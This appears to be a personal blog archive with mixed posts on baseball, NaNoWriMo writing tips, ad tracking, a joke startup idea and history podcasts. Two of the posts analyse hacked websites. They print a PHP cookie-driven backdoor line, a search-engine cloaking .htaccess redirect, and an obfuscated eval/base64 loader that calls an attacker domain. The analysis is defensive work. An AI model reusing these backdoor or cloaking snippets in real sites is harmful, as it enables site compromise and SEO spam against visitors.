Some Baseball Team Won

Some baseball team won last night. How do I know? I heard the explosions intermixed with what I am sure was gun fire. At midnight. The most boring game bringing a city to its knees in prayer.

I used to go to games, once or twice a year, only to leave by the 7th inning. When I was a kid I had the complete line up of ’69 cubbies in baseball cards. They would wind up pinned to the forks of my spider bike to slap the spokes as we rode through our kingdom. Listening to the games on the radio was comforting, dreamlike, with visions of playing for the majors when I got big.

Then life happened and I became less and less interested in the cubs. Sometimes they won, but mostly they lost. And I guess that is what I liked most of all. They marched on, moments of baseball glory peppered throughout. Kerry Wood  and Sammy Sosa to name two.

And then Bartman.

I watched that game…at least I think I did. Memory is fuzzy. I am pretty sure I did because I remember the team falling apart, giving up bases and runs after the incident. And I remember feeling sorry for the guy. Wrong place, wrong time. Didn’t matter. The cubs sucked and nearly everyone, including players, took it out on this fan.

I stopped caring from that point. It wasn’t that the cubs were at fault. They just played crappy baseball. It was the fans, who, within shot of winning, came up with any scapegoat they could. A sap sitting on the 3rd base line. Wind. A curse and an actual fucking goat.

Are all cub fans bad? That’s a stupid question. Should I base my liking of a team on the fans? Probably, but it doesn’t really matter. In truth baseball is boring. And if you are excited to see some millionaires in pajamas doing better in a park than other millionaires in different pajamas, then that’s good. Sports are important in society, and you are in a vital role.

Sometimes that role lifts all to higher plane.

screen-shot-2016-11-03-at-8-52-56-am

…and sometimes not.

10 steps to a successful #NaNoWriMo

In my latest newsletter, after several weeks of tackling how to defeat writer’s block, I have laid out my 10 steps to accomplishing 50k words in 30 days. If you have decided to tackle the Beast that is #NaNoWriMo, I hope this may be of some help:

  1. Write. Don’t edit. Write. Don’t read back what you read. Don’t give it to other people to read. Don’t fix misspellings. Don’t tell people about your story. Don’t think people will care. They probably will, but you need to do this for you.
  2. Continually remind yourself that all bad writing can be fixed. All of it.
  3. If you get stuck, ask why. (read my earlier newsletters on blocks) If you get really stuck, start another chapter. If you get really, really stuck, go back ten years and write about a character and develop their backstory.
  4. Write every day.
  5. Write beyond the daily limit every day. You’ll thank me later.
  6. Stop world building. Start character building. Unless you are stuck: Only world build if you are stuck. Otherwise, focus, always focus, on conflict, action, and character. (not shot em up conflict, but internal conflict, which drives a character to action, which in turn reveals character…which in turn creates an emotional link with the reader.) This is your goal.
  7. Tell your family what you are doing. Give them expectations in which to work with you. They will support you; they want to help, but you need to communicate this to them.
  8. Do NOT reward yourself until you have actually written something. Coffee, tea, music, checking facebook feeds, until you have written 250 words.
  9. Only when you have passed the 1,666 word count should you post anything on social media. Period. Do not pass Go, do not collect $200. You only have so many words in you per day. Don’t wast them in facebook.
  10. Write that novel. Spill your guts. Bleed. Be afraid. Know that you are not alone, no matter how lonely it really is.

Tools

Looking for some last minute planning help? Check out Lou’s NaNoWriMo Prep: One Hour Novel Plotting Guide

And when it is all over…

…come December you will package it up and send it off to one hundred lit agents and a bidding war will ensure.
Just kidding. Please, do not do this. (You would be surprised how many actually do)

Other musings on writing can be found HERE and on Twitter

Continually uncomfortable at how ads read my private emails

I have never done a google search on orthopedic surgeons. I have no need to. My wife, that’s a different story. If you follow my exploits in any of the slack channels I manage, you’ll know this is a trying time for us. But I have never searched for an orthopedic surgeon, nor visited any from links or discussion groups.

I just wanted to say that.

Oh, and I don’t speak Spanish, am not looking for an older lady for adult fun, nor do I seek lower interest rates, no matter what the ads on Pandora continually tell me. I really don’t.

Today is different. Here is a screen grab of my pandora page today:

screen-shot-2016-10-28-at-12-31-23-pm

My wife sent me an email about the doctor she is seeing for a second opinion at Rush hospital in Chicago. I have never seen this ad before on Pandora. Like I mentioned, normally Pandora thinks I speak Spanish, am looking for an older lady friend, and a lower interest rate on my home.

Now, obviously Pandora does not control the ads; Google does. And the email is, wait for it….gmail. This all comes as no surprise, aside from the speed and blatancy. It was like, “HOLY CRAP, WE HAVE AN AD THIS GUY MAY WANT TO SEE!!!”

…all hail our robot overlords

 

New WP Hack

So this new hit me pretty hard today. Normal WordPress hack I go through the plugins, see what’s infected, and work my way out. This time? Nope. Heck, even Google’s Safe Browsing Site Status came back as “Not Dangerous”. Online scanners came back clean, and was beginning to question what was what when, lo and behold in the Google SERP: This site may be hacked.

Something was amiss. The plugin CodeGuard was installed and activated. From their service: “When a change is detected, we will alert you and take a new backup of your database and site content.” There are a lot of backups in the site, and I wondered if the site owner was ever notified, or even cared. Upon closer inspection the API for the service was not set. 

All files were touched by the hack, the line:

if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);

added to each core file. index.php, .htaccess and file in root called post.php where altered/added respectively. Because of their size I put them up on github at: https://github.com/michalsen/hacked_files

Yep, this server was rooted.

132fc221677982e3b191f925ba38d889-tumblr_ms5j3aewyh1qg8holo1_500

 

 

Start Up Idea

Here is my start up idea:

We provide companies with Razor scooters, ping pong tables, beer kegs, pretty people with nice teeth, and a photographer. We show up, have a party, take pictures and you can post them online to show how cutting edge you are.

It’s a win/win. You get to market what a cool company you have without actually having all those stupid distractions, and I make money off your stupidity thinking that’s what it takes to market a cool company.

This idea is for sale. $400. Yes, you can just take the idea, but I’ll put a Gypsy curse on you, if you do. For your piece of mind, $400 is pretty cheap.

King of Kings :: addendum

You have finished the latest Dan Carlin epic cast: King of Kings, including that 5 hour finally! Now what? You want more, but unsure where to turn? How about some extra material to help you dig into the history

 

Screen Shot 2016-08-22 at 1.15.16 PM

History on Fire Podcast
History professor Daniele Bolelli
The 10,000 part 1
The 10,000 part 2

 

 

 

 

 

Screen Shot 2016-08-22 at 1.15.35 PMGates of Fire: An Epic Novel of the Battle of Thermopylae
Steven Pressfield

Can not recommend this enough. Great read! 5 stars from me on amazon.

 

 

 

 

Screen Shot 2016-08-22 at 1.15.55 PMThe Ten Thousand: A Novel of Ancient Greece
Michael Curtis Ford

I read this book about 2 years ago, and enjoyed it.

 

 

 

 

 

If you have other reads of podcasts you would like to see added this, please let me know in the comments below.

.htaccess compromised

Screen Shot 2016-08-09 at 7.08.01 AM

A simple, clean, flat html site was recently hacked for its Search Engine referrer. Arriving at the site by typing the domain, or some secondary link, would provide the site without issue. Arriving via an SE or with an SE user agent, well, that’s a paddlin’

paddlin.png

Here’s the .htaccess file

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ – [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ details-enforcers.php?$1 [L]

ooooh…details-enforcers.php. Sounds important! Let’s take a look:

Screen Shot 2016-08-09 at 7.15.35 AM

Hello Mr. Fancy Pants. Let’s see what you are trying to hide:

That first variable is

$meymun=”\x63″.chr(114).”\x65″.”a”.chr(116).chr(101).”_”.chr(102).”u”.”n”.”\x63″.chr(116).chr(105).chr(111).chr(110); 

is fancy-speak for create_function

$qweboi = $meymun(‘$a’,strrev(‘;)a$(lave’));

becomes an anonymous function lambda_1. Then the next line we see a strrev(), because nothing is as secure as reversing a string. So lets do it: Hey, it’s an eval(base64_decode())! **sarcasm**

It is a PHP script I have put HERE. What’s funny is that they base64_encoded() a domain name in the script:

 $domain=base64_decode(“bWFnMWN3MHJsZC5jb20=”); 

That sends content. The domain?

mag1cw0rld.com

You know they are good because they use 1’s for i’s and zero’s for o’s.

9555997_orig.png